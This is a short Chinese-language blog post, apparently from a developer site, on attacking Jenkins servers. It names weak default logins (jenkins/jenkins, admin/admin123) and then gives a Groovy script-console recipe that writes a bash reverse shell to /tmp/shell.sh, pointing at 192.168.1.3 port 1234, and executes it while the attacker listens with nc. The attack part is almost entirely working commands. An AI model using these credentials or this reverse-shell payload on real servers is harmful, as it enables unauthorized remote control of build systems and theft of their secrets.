web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins

使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句

new File("/tmp/shell.sh").write('bash -i >& /dev/tcp/192.168.1.3/1234 0>&1'

println "ls-al/tmp/shell.sh".execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

相关推荐
pe7er3 小时前
window管理开发环境篇 - 持续更新
前端·后端
We་ct4 小时前
LeetCode 5. 最长回文子串:DP + 中心扩展
前端·javascript·算法·leetcode·typescript
陈随易8 小时前
有生之年系列,Nodejs进程管理pm2 v7.0发布
前端·后端·程序员
冰暮流星8 小时前
javascript之事件代理/事件委托
前端
陈随易9 小时前
AI时代,你还在坚持手搓文章吗
前端·后端·程序员
里欧跑得慢11 小时前
17. Flutter Hero动画实现:让界面过渡更加优雅
前端·css·flutter·web
IT_陈寒12 小时前
Vue的这个响应式陷阱,我debug了一整天才爬出来
前端·人工智能·后端
kyriewen12 小时前
前端测试:别为了100%覆盖率而写测试,那是自欺欺人
前端·javascript·单元测试
去伪存真12 小时前
我自己写的第一个skills--project-core-standards
前端·agent
Data_Journal12 小时前
如何使用cURL更改User Agent
大数据·服务器·前端·javascript·数据库